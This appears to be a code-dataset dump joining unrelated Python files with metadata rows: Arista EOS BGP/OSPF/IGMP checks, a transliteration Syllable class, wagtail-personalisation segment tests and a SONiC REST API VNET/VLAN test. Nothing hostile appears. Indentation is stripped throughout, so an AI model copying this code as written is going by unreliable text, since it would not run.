`False` otherwise.
"""
try:
response = device.runCmds(1, ['show bgp ipv4 unicast summary vrf all'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['vrfs']) == 0:
return None
for vrf in response[0]['vrfs']:
for peer in response[0]['vrfs'][vrf]['peers']:
if (response[0]['vrfs'][vrf]['peers'][peer]['peerState'] != 'Established') \
or (response[0]['vrfs'][vrf]['peers'][peer]["inMsgQueue"] != 0) \
or (response[0]['vrfs'][vrf]['peers'][peer]["outMsgQueue"] != 0):
return False
return True
except KeyError:
return None
def verify_bgp_ipv4_unicast_count(device, enable_password, number, vrf = 'default'):
"""
Verifies all IPv4 unicast BGP sessions are established
and all BGP messages queues for these sessions are empty
and the actual number of BGP IPv4 unicast neighbors is the one we expect.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
number (int): Expected number of BGP IPv4 unicast neighbors
vrf(str): VRF to verify.
Returns:
bool: `True` if all IPv4 unicast BGP sessions are established
and if all BGP messages queues for these sessions are empty
and if the actual number of BGP IPv4 unicast neighbors is the one we expect.
`False` otherwise.
"""
if not number:
return None
if not vrf:
return None
count = 0
command = 'show bgp ipv4 unicast summary vrf ' + vrf
try:
response = device.runCmds(1, [command], 'json')
except jsonrpc.AppError:
return None
try:
for peer in response[0]['vrfs'][vrf]['peers']:
if (response[0]['vrfs'][vrf]['peers'][peer]['peerState'] != 'Established') \
or (response[0]['vrfs'][vrf]['peers'][peer]["inMsgQueue"] != 0) \
or (response[0]['vrfs'][vrf]['peers'][peer]["outMsgQueue"] != 0):
return False
count = count + 1
if count == number:
return True
return False
except KeyError:
return None
def verify_bgp_ipv6_unicast_state(device, enable_password):
"""
Verifies all IPv6 unicast BGP sessions are established (for all VRF)
and all BGP messages queues for these sessions are empty (for all VRF).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if all IPv6 unicast BGP sessions are established (for all VRF)
and all BGP messages queues for these sessions are empty (for all VRF).
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show bgp ipv6 unicast summary vrf all'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['vrfs']) == 0:
return None
for vrf in response[0]['vrfs']:
for peer in response[0]['vrfs'][vrf]['peers']:
if (response[0]['vrfs'][vrf]['peers'][peer]['peerState'] != 'Established') \
or (response[0]['vrfs'][vrf]['peers'][peer]["inMsgQueue"] != 0) or \
(response[0]['vrfs'][vrf]['peers'][peer]["outMsgQueue"] != 0):
return False
return True
except KeyError:
return None
def verify_bgp_evpn_state(device, enable_password):
"""
Verifies all EVPN BGP sessions are established (default VRF).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if all EVPN BGP sessions are established.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show bgp evpn summary'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['vrfs']['default']['peers']) == 0:
return None
for peer in response[0]['vrfs']['default']['peers']:
if response[0]['vrfs']['default']['peers'][peer]['peerState'] != 'Established':
return False
return True
except KeyError:
return None
def verify_bgp_evpn_count(device, enable_password, number):
"""
Verifies all EVPN BGP sessions are established (default VRF)
and the actual number of BGP EVPN neighbors is the one we expect (default VRF).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
number (int): The expected number of BGP EVPN neighbors in the default VRF.
Returns:
bool: `True` if all EVPN BGP sessions are established
and if the actual number of BGP EVPN neighbors is the one we expect.
`False` otherwise.
"""
if not number:
return None
try:
response = device.runCmds(1, ['show bgp evpn summary'], 'json')
except jsonrpc.AppError:
return None
count = 0
try:
for peer in response[0]['vrfs']['default']['peers']:
if response[0]['vrfs']['default']['peers'][peer]['peerState'] != 'Established':
return False
count = count + 1
if count == number:
return True
return False
except KeyError:
return None
def verify_bgp_rtc_state(device, enable_password):
"""
Verifies all RTC BGP sessions are established (default VRF).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if all RTC BGP sessions are established.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show bgp rt-membership summary'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['vrfs']['default']['peers']) == 0:
return None
for peer in response[0]['vrfs']['default']['peers']:
if response[0]['vrfs']['default']['peers'][peer]['peerState'] != 'Established':
return False
return True
except KeyError:
return None
def verify_bgp_rtc_count(device, enable_password, number):
"""
Verifies all RTC BGP sessions are established (default VRF)
and the actual number of BGP RTC neighbors is the one we expect (default VRF).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
number (int): The expected number of BGP RTC neighbors (default VRF).
Returns:
bool: `True` if all RTC BGP sessions are established
and if the actual number of BGP RTC neighbors is the one we expect.
`False` otherwise.
"""
if not number:
return None
try:
response = device.runCmds(1, ['show bgp rt-membership summary'], 'json')
except jsonrpc.AppError:
return None
count = 0
try:
for peer in response[0]['vrfs']['default']['peers']:
if response[0]['vrfs']['default']['peers'][peer]['peerState'] != 'Established':
return False
count = count + 1
if count == number:
return True
return False
except KeyError:
return None
def verify_ospf_state(device, enable_password):
"""
Verifies all OSPF neighbors are in FULL state.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if all OSPF neighbors are in FULL state.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show ip ospf neighbor | exclude FULL|Address'], 'text')
except jsonrpc.AppError:
return None
try:
if response[0]['output'].count('\n') == 0:
return True
return False
except KeyError:
return None
def verify_ospf_count(device, enable_password, number = None):
"""
Verifies the number of OSPF neighbors in FULL state is the one we expect.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
number (int): The expected number of OSPF neighbors in FULL state.
Returns:
bool: `True` if the number of OSPF neighbors in FULL state is the one we expect.
`False` otherwise.
"""
if not number:
return None
try:
response = device.runCmds(1, ['show ip ospf neighbor | exclude Address'], 'text')
except jsonrpc.AppError:
return None
try:
if response[0]['output'].count('FULL') == number:
return True
return False
except KeyError:
return None
def verify_igmp_snooping_vlans(device, enable_password, vlans, configuration):
"""
Verifies the IGMP snooping configuration for some VLANs.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
vlans (list): A list of VLANs
configuration (str): Expected IGMP snooping configuration (enabled or disabled) for these VLANs.
Returns:
bool: `True` if the IGMP snooping configuration for the VLANs is the one we expect.
`False` otherwise.
"""
if not vlans or not configuration:
return None
try:
response = device.runCmds(1, ['show ip igmp snooping'],'json')
except jsonrpc.AppError:
return None
try:
for vlan in vlans:
if response[0]['vlans'][str(vlan)]['igmpSnoopingState'] != configuration:
return False
return True
except KeyError:
return None
def verify_igmp_snooping_global(device, enable_password, configuration):
"""
Verifies the IGMP snooping global configuration.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
configuration (str): Expected global IGMP snooping configuration (enabled or disabled) for these VLANs.
Returns:
bool: `True` if the IGMP snooping global configuration is the one we expect.
`False` otherwise.
"""
if not configuration:
return None
try:
response = device.runCmds(1, ['show ip igmp snooping'],'json')
except jsonrpc.AppError:
return None
try:
if response[0]['igmpSnoopingState'] == configuration:
return True
return False
except KeyError:
return None
| 34.01186 | 128 | 0.611871 | 6,311 | 54,487 | 5.242909 | 0.072255 | 0.068544 | 0.0897 | 0.043248 | 0.838219 | 0.795334 | 0.772999 | 0.737276 | 0.699015 | 0.676015 | 0 | 0.015727 | 0.277644 | 54,487 | 1,601 | 129 | 34.033104 | 0.824945 | 0.438123 | 0 | 0.677623 | 0 | 0 | 0.160249 | 0.006093 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067004 | false | 0.074589 | 0.001264 | 0 | 0.384324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
fea613a117f3974044ed730663e39ea2eb007361 | 464 | py | Python | phonology-augmented_transliterator/tone_setter/shared_res/Syllable.py | ngohgia/transliteration | 3acb47a097ff3b320a0718d15c6e62965d346888 | [
"MIT"
] | 1 | 2022-02-21T03:07:06.000Z | 2022-02-21T03:07:06.000Z | phonology-augmented_transliterator/tone_setter/shared_res/Syllable.py | ngohgia/transliteration | 3acb47a097ff3b320a0718d15c6e62965d346888 | [
"MIT"
] | null | null | null | phonology-augmented_transliterator/tone_setter/shared_res/Syllable.py | ngohgia/transliteration | 3acb47a097ff3b320a0718d15c6e62965d346888 | [
"MIT"
] | null | null | null | class Syllable:
def __init__(self):
self.roles = []
self.vie_phonemes = []
self.tone = 1
def create_new_syl(self, vie_phonemes, roles, tone):
self.roles = roles
self.vie_phonemes = vie_phonemes
self.tone = tone
def get_roles_str(self):
return (" ").join(self.roles)
def get_vie_phonemes_str(self):
return (" ").join(self.vie_phonemes)
def __str__(self):
return " ".join(self.vie_phonemes) + " _" + str(self.tone)
| 22.095238 | 62 | 0.650862 | 64 | 464 | 4.375 | 0.265625 | 0.275 | 0.267857 | 0.182143 | 0.303571 | 0.228571 | 0.228571 | 0 | 0 | 0 | 0 | 0.002732 | 0.211207 | 464 | 20 | 63 | 23.2 | 0.762295 | 0 | 0 | 0 | 0 | 0 | 0.010799 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.2 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
22a9be500c601bb2e0bc84300f3264adcba0c22b | 3,233 | py | Python | tests/unit/test_rules_query.py | ixc/wagtail-personalisation | 956c1bf4f5846ad86470c41df8b8364bc99ab99b | [
"MIT"
] | 68 | 2018-01-26T22:02:09.000Z | 2022-03-23T08:08:54.000Z | tests/unit/test_rules_query.py | ixc/wagtail-personalisation | 956c1bf4f5846ad86470c41df8b8364bc99ab99b | [
"MIT"
] | 46 | 2018-05-26T09:26:30.000Z | 2022-02-04T15:17:45.000Z | tests/unit/test_rules_query.py | ixc/wagtail-personalisation | 956c1bf4f5846ad86470c41df8b8364bc99ab99b | [
"MIT"
] | 27 | 2018-03-28T10:14:26.000Z | 2022-02-08T20:54:00.000Z | import pytest
from tests.factories.rule import QueryRuleFactory
from tests.factories.segment import SegmentFactory
@pytest.mark.django_db
def test_request_query_rule(client, site):
segment = SegmentFactory(name='Query')
QueryRuleFactory(
parameter="query",
value="value",
segment=segment,
)
response = client.get('/?query=value')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'query' for item in client.session['segments'])
@pytest.mark.django_db
def test_request_only_one_query_rule(client, site):
segment = SegmentFactory(name='Query')
QueryRuleFactory(
parameter="query",
value="value",
segment=segment
)
response = client.get('/?test=test&query=value')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'query' for item in client.session['segments'])
@pytest.mark.django_db
def test_request_multiple_queries(client, site):
segment = SegmentFactory(name='Multiple queries')
QueryRuleFactory(
parameter="test",
value="test",
segment=segment
)
QueryRuleFactory(
parameter="query",
value="value",
segment=segment,
)
response = client.get('/?test=test&query=value')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'multiple-queries'
for item in client.session['segments']
)
@pytest.mark.django_db
def test_request_persistent_segmenting(client, site):
segment = SegmentFactory(name='Persistent', persistent=True)
QueryRuleFactory(
parameter="test",
value="test",
segment=segment
)
response = client.get('/?test=test')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'persistent'
for item in client.session['segments'])
response = client.get('/')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'persistent'
for item in client.session['segments'])
@pytest.mark.django_db
def test_request_non_persistent_segmenting(client, site):
segment = SegmentFactory(name='Non Persistent')
QueryRuleFactory(
parameter="test",
value="test",
segment=segment
)
response = client.get('/?test=test')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'non-persistent'
for item in client.session['segments'])
response = client.get('/')
assert response.status_code == 200
assert not any(
item['encoded_name'] == 'non-persistent'
for item in client.session['segments'])
@pytest.mark.django_db
def test_request_match_any_segmenting(client, site):
segment = SegmentFactory(name='Match any', match_any=True)
QueryRuleFactory(
parameter='test',
value='test',
segment=segment,
)
QueryRuleFactory(
parameter='test2',
value='test2',
segment=segment
)
response = client.get('/?test=test')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'match-any'
for item in client.session['segments'])
| 25.456693 | 79 | 0.646768 | 353 | 3,233 | 5.796034 | 0.127479 | 0.097752 | 0.066471 | 0.093842 | 0.883187 | 0.86608 | 0.829423 | 0.76002 | 0.756109 | 0.69306 | 0 | 0.01045 | 0.230436 | 3,233 | 126 | 80 | 25.65873 | 0.811897 | 0 | 0 | 0.69 | 0 | 0 | 0.144757 | 0.014228 | 0 | 0 | 0 | 0 | 0.16 | 1 | 0.06 | false | 0 | 0.03 | 0 | 0.09 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
22abb520b0ca898ae7a05b0f1b7d5e20d4baeff0 | 31 | py | Python | mpst_ts/scribble/__init__.py | stscript-cgo/STScript | d2ab2a05b997e9487fd3057a38dcec67feb20e53 | [
"Apache-2.0"
] | null | null | null | mpst_ts/scribble/__init__.py | stscript-cgo/STScript | d2ab2a05b997e9487fd3057a38dcec67feb20e53 | [
"Apache-2.0"
] | null | null | null | mpst_ts/scribble/__init__.py | stscript-cgo/STScript | d2ab2a05b997e9487fd3057a38dcec67feb20e53 | [
"Apache-2.0"
] | null | null | null | from .scribble import get_graph | 31 | 31 | 0.870968 | 5 | 31 | 5.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 31 | 1 | 31 | 31 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
22d111f648ecb340db36aa7d93aad1000f511f6c | 266 | py | Python | models/bart/__init__.py | ShuyangCao/cliff_summ | 328c83cddc92e00ad8e22f016162c93dedcda3a2 | [
"Apache-2.0"
] | 14 | 2021-09-22T10:43:02.000Z | 2022-03-22T04:54:50.000Z | models/bart/__init__.py | ShuyangCao/cliff_summ | 328c83cddc92e00ad8e22f016162c93dedcda3a2 | [
"Apache-2.0"
] | 10 | 2021-10-08T22:08:30.000Z | 2022-03-30T23:45:30.000Z | models/bart/__init__.py | ShuyangCao/cliff_summ | 328c83cddc92e00ad8e22f016162c93dedcda3a2 | [
"Apache-2.0"
] | 3 | 2021-09-22T15:32:40.000Z | 2021-11-17T11:29:55.000Z | from . import contrastive_translation
from . import contrastive_loss
from . import contrastive_translation_multi_neg
from . import constrative_bart
from . import unlikelihood_translation
from . import unlikelihood_loss
from . import contrastive_translation_batch_neg | 38 | 47 | 0.87218 | 32 | 266 | 6.90625 | 0.34375 | 0.316742 | 0.380091 | 0.434389 | 0.325792 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101504 | 266 | 7 | 48 | 38 | 0.924686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
22d1cb29187267997e35f3cee5f89f22a84895d5 | 223 | py | Python | app/routes/index.py | oseme-techguy/python-pdf-annotation-api-demo | b86dd4e20e9cc13237eacc9a32bb142d4bb28755 | [
"MIT"
] | 1 | 2019-10-10T17:15:23.000Z | 2019-10-10T17:15:23.000Z | app/routes/index.py | oseme-techguy/python-pdf-annotation-api-demo | b86dd4e20e9cc13237eacc9a32bb142d4bb28755 | [
"MIT"
] | null | null | null | app/routes/index.py | oseme-techguy/python-pdf-annotation-api-demo | b86dd4e20e9cc13237eacc9a32bb142d4bb28755 | [
"MIT"
] | null | null | null | """PDF Annotation API - web request handlers."""
from sanic import response
# pylint: disable=W0613
async def index(request):
"""Index request handler."""
return response.text("Welcome to the PDF Annotation API")
| 24.777778 | 61 | 0.717489 | 29 | 223 | 5.517241 | 0.758621 | 0.1625 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021505 | 0.165919 | 223 | 8 | 62 | 27.875 | 0.83871 | 0.29148 | 0 | 0 | 0 | 0 | 0.266129 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
22e8172e8dee79d5b29c7ec6e6baa960069e518b | 136 | py | Python | __init__.py | hsol/homework-toss-server | fd306cecbf9c26943256de3e2663b58982aba57b | [
"MIT"
] | null | null | null | __init__.py | hsol/homework-toss-server | fd306cecbf9c26943256de3e2663b58982aba57b | [
"MIT"
] | null | null | null | __init__.py | hsol/homework-toss-server | fd306cecbf9c26943256de3e2663b58982aba57b | [
"MIT"
] | null | null | null | """
# The Team Showcase
Blue, Inc.라는 회사의 조직 구성을 소개하는 one page server를 제작합니다.

""" | 19.428571 | 53 | 0.727941 | 22 | 136 | 4.409091 | 0.727273 | 0.216495 | 0.463918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147059 | 136 | 7 | 54 | 19.428571 | 0.836207 | 0.933824 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
22ff8f45f6be2a600294755ec63b18dde873aea0 | 20,768 | py | Python | tests/restapi/test_restapi.py | emilmih/sonic-mgmt | e4e42ec8028bf51b39587e2b53e526d505fe7938 | [
"Apache-2.0"
] | null | null | null | tests/restapi/test_restapi.py | emilmih/sonic-mgmt | e4e42ec8028bf51b39587e2b53e526d505fe7938 | [
"Apache-2.0"
] | 3 | 2020-11-24T16:04:56.000Z | 2021-06-15T06:44:10.000Z | tests/restapi/test_restapi.py | emilmih/sonic-mgmt | e4e42ec8028bf51b39587e2b53e526d505fe7938 | [
"Apache-2.0"
] | null | null | null | import pytest
import time
import logging
import requests
import json
from tests.common.helpers.assertions import pytest_assert
from restapi_operations import Restapi
logger = logging.getLogger(__name__)
pytestmark = [
pytest.mark.topology('t0'),
pytest.mark.disable_loganalyzer
]
CLIENT_CERT = 'restapiclient.crt'
CLIENT_KEY = 'restapiclient.key'
restapi = Restapi(CLIENT_CERT, CLIENT_KEY)
'''
This test creates a default VxLAN Tunnel and two VNETs. It adds VLAN, VLAN member, VLAN neighbor and routes to each VNET
'''
def test_data_path(construct_url, vlan_members):
# Create Default VxLan Tunnel
params = '{"ip_addr": "10.1.0.32"}'
logger.info("Creating Default VxLan Tunnel with ip_addr: 10.1.0.32")
r = restapi.post_config_tunnel_decap_tunnel_type(construct_url, 'vxlan', params)
pytest_assert(r.status_code == 204)
# Check RESTAPI server heartbeat
logger.info("Checking for RESTAPI server heartbeat")
restapi.heartbeat(construct_url)
#
# Create first VNET and add VLAN, VLAN member, VLAN neighbor and routes to it
#
# Create VNET
params = '{"vnid": 7036001}'
logger.info("Creating VNET vnet-guid-2 with vnid: 7036001")
r = restapi.post_config_vrouter_vrf_id(construct_url, 'vnet-guid-2', params)
pytest_assert(r.status_code == 204)
# Verify VNET has been created
r = restapi.get_config_vrouter_vrf_id(construct_url, 'vnet-guid-2')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"vnid": 7036001}, "vnet_id": "vnet-guid-2"}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VNET with vnet_id: vnet-guid-2 has been successfully created with vnid: 7036001")
# Create VLAN
params = '{"vnet_id": "vnet-guid-2", "ip_prefix": "100.0.10.1/24"}'
logger.info("Creating VLAN 2000 with ip_prefix: 100.0.10.1/24 under vnet_id: vnet-guid-2")
r = restapi.post_config_vlan(construct_url, '2000', params)
pytest_assert(r.status_code == 204)
# Verify VLAN has been created
r = restapi.get_config_vlan(construct_url, '2000')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"ip_prefix": "100.0.10.1/24", "vnet_id": "vnet-guid-2"}, "vlan_id": 2000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VLAN 2000 with ip_prefix: 100.0.10.1/24 under vnet_id: vnet-guid-2 has been successfully created")
vlan_intf = vlan_members[0]
logger.info("VLAN Interface: "+vlan_intf)
# Add and configure VLAN member
params = '{"tagging_mode": "tagged"}'
logger.info("Adding "+vlan_intf+" with tagging_mode: tagged to VLAN 2000")
r = restapi.post_config_vlan_member(construct_url, '2000', vlan_intf, params)
pytest_assert(r.status_code == 204)
# Verify VLAN member has been added
r = restapi.get_config_vlan_member(construct_url, '2000', vlan_intf)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"if_name": "'+vlan_intf+'", "vlan_id": 2000, "attr": {"tagging_mode": "tagged"}}'
pytest_assert(r.json() == json.loads(expected))
logger.info(vlan_intf+" with tagging_mode: tagged has been successfully added to VLAN 2000")
# Add neighbor
params = '{}'
logger.info("Adding neighbor 100.0.10.4 to VLAN 2000")
r = restapi.post_config_vlan_neighbor(construct_url, '2000', '100.0.10.4', params)
pytest_assert(r.status_code == 204)
# Verify neighbor has been added
r = restapi.get_config_vlan_neighbor(construct_url, '2000', '100.0.10.4')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"ip_addr": "100.0.10.4", "vlan_id": 2000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("Neighbor 100.0.10.4 has been successfully added to VLAN 2000")
# Add routes
params = '[{"cmd": "add", "ip_prefix": "100.0.20.4/32", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": null}, \
{"cmd": "add", "ip_prefix": "101.0.20.5/32", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": "1c:34:da:72:b0:8a"}, \
{"cmd": "add", "ip_prefix": "192.168.20.4/32", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": null}, \
{"cmd": "add", "ip_prefix": "100.0.30.0/24", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": null}]'
logger.info("Adding routes with vnid: 7036001 to VNET vnet-guid-2")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-2', params)
pytest_assert(r.status_code == 204)
# Verify routes
# Add some delay before query
time.sleep(5)
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-2', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = [{"nexthop": "100.3.152.52", "ip_prefix": "192.168.20.4/32", "vnid": 7036001},
{"nexthop": "100.3.152.52", "ip_prefix": "101.0.20.5/32", "mac_address": "1c:34:da:72:b0:8a", "vnid": 7036001},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.20.4/32", "vnid": 7036001},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.30.0/24", "vnid": 7036001}]
for route in expected:
pytest_assert(route in r.json())
logger.info("Routes with vnid: 7036001 to VNET vnet-guid-2 have been added successfully")
# Add routes
params = '[{"cmd": "add", "ip_prefix": "100.0.50.4/24", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": null}, \
{"cmd": "add", "ip_prefix": "100.0.70.0/16", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": null}]'
logger.info("Adding routes with incorrect CIDR addresses with vnid: 7036001 to VNET vnet-guid-2")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-2', params)
pytest_assert(r.status_code == 207)
# Verify routes have not been added
# Add some delay before query
time.sleep(5)
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-2', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = [{"nexthop": "100.3.152.52", "ip_prefix": "100.0.50.4/24", "vnid": 7036001},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.70.0/16", "vnid": 7036001}]
for route in expected:
pytest_assert(route not in r.json())
logger.info("Routes with incorrect CIDR addresses with vnid: 7036001 to VNET vnet-guid-2 have not been added successfully")
#
# Create second VNET and add VLAN, VLAN member, VLAN neighbor and routes to it
#
# Create VNET
params = '{"vnid": 7036002}'
logger.info("Creating VNET vnet-guid-3 with vnid: 7036002")
r = restapi.post_config_vrouter_vrf_id(construct_url, 'vnet-guid-3', params)
pytest_assert(r.status_code == 204)
# Verify VNET has been created
r = restapi.get_config_vrouter_vrf_id(construct_url, 'vnet-guid-3')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"vnid": 7036002}, "vnet_id": "vnet-guid-3"}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VNET with vnet_id: vnet-guid-3 has been successfully created with vnid: 7036002")
# Create VLAN
params = '{"vnet_id": "vnet-guid-3", "ip_prefix": "192.168.10.1/24"}'
logger.info("Creating VLAN 3000 with ip_prefix: 192.168.10.1/24 under vnet_id: vnet-guid-3")
r = restapi.post_config_vlan(construct_url, '3000', params)
pytest_assert(r.status_code == 204)
# Verify VLAN has been created
r = restapi.get_config_vlan(construct_url, '3000')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"ip_prefix": "192.168.10.1/24", "vnet_id": "vnet-guid-3"}, "vlan_id": 3000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VLAN 3000 with ip_prefix: 192.168.10.1/24 under vnet_id: vnet-guid-3 has been successfully created")
vlan_intf = vlan_members[1]
logger.info("VLAN Interface: "+vlan_intf)
# Add and configure VLAN member
params = '{"tagging_mode": "tagged"}'
logger.info("Adding "+vlan_intf+" with tagging_mode: tagged to VLAN 3000")
r = restapi.post_config_vlan_member(construct_url, '3000', vlan_intf, params)
pytest_assert(r.status_code == 204)
# Verify VLAN member has been added
r = restapi.get_config_vlan_member(construct_url, '3000', vlan_intf)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"if_name": "'+vlan_intf+'", "vlan_id": 3000, "attr": {"tagging_mode": "tagged"}}'
pytest_assert(r.json() == json.loads(expected))
logger.info(vlan_intf+" with tagging_mode: tagged has been successfully added to VLAN 3000")
# Add neighbor
params = '{}'
logger.info("Adding neighbor 192.168.10.4 to VLAN 2000")
r = restapi.post_config_vlan_neighbor(construct_url, '3000', '192.168.10.4', params)
pytest_assert(r.status_code == 204)
# Verify neighbor has been added
r = restapi.get_config_vlan_neighbor(construct_url, '3000', '192.168.10.4')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"ip_addr": "192.168.10.4", "vlan_id": 3000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("Neighbor 192.168.10.4 has been successfully added to VLAN 3000")
# Add routes
params = '[{"cmd": "add", "ip_prefix": "100.0.20.4/32", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": null}, \
